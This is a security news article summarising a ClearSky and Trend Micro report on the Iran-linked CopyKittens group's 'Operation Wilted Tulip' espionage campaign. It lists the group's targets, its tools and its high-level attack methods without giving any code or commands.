Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

APT

Experts detailed the new Operation Wilted Tulip campaign of the CopyKittens APT

Researchers from ClearSky and Trend Micro uncovered a new massive cyber espionage campaign conducted by CopyKittens dubbed ‘Operation Wilted Tulip’ A joint investigation conducted by experts from the Israeli cyber-intelligence firm by ClearSky and Trend Micro uncovered a new massive cyber espionage campaign dubbed ‘Operation Wilted Tulip’ conducted by an Iran-linked APT group CopyKittens (aka Rocket Kittens). The […]

CopyKittens report

Researchers from ClearSky and Trend Micro uncovered a new massive cyber espionage campaign conducted by CopyKittens dubbed ‘Operation Wilted Tulip’

A joint investigation conducted by experts from the Israeli cyber-intelligence firm by ClearSky and Trend Micro uncovered a new massive cyber espionage campaign dubbed ‘Operation Wilted Tulip’ conducted by an Iran-linked APT group CopyKittens (aka Rocket Kittens).

CopyKittens report

The hackers targeted government and academic organizations in various countries, according to the experts the group has been active since at least since 2013.

In 2015, ClearSky detected new activity from the Rocket kitten APT group against 550 targets, most of which are located in the Middle East.

The CopyKittens hackers targeted organisations and individuals in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.

The joint report published by ClearSky and Trend Micro includes details on the Operation Wilted Tulip and described the TTPs (techniques, tactics, and procedures) adopted by the Rocket Kittens APT group.

“CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and ZPP, a files compression console program. The group also uses Matryoshka v1, a selfdeveloped RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with
similar functionality.  The group often uses the trial version of Cobalt Strike3 , a publicly available commercial software for “Adversary Simulations and Red Team Operations.” states the report .

“Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine;
Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap.”

The hackers used both spear phishing attacks and watering holes to compromise target systems.

CopyKittens compromised websites of media outlets and organizations to deliver its malware. Among the websites compromised by hackers to conduct watering hole attacks, there is The Jerusalem Post, the Maariv news and IDF Disabled Veterans Organization.

Below the full list of methods used by CopyKittens in its campaigns.

  • Watering hole attacks – inserting malicious JavaScript code into breached strategic websites.
  • Web based exploitation – emailing links to websites built by the attackers and containing known exploits.
  • Malicious documents – email attachments containing weaponized Microsoft Office documents.
  • Fake social media entities – fake personal and organizational Facebook pages are used for interaction with targets and for information gathering.
  • Web hacking – Havij, Acuntix and sqlmap are used to detect and exploit internet-facing web servers.

The hackers used multiple tools and malware to infect targets, they used both custom malicious codes and commercial solutions like Cobalt Strike.

Enjoy the report!

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – CopyKittens, cyber espionage)

[adrotate banner=”5″]

[adrotate banner=”13″]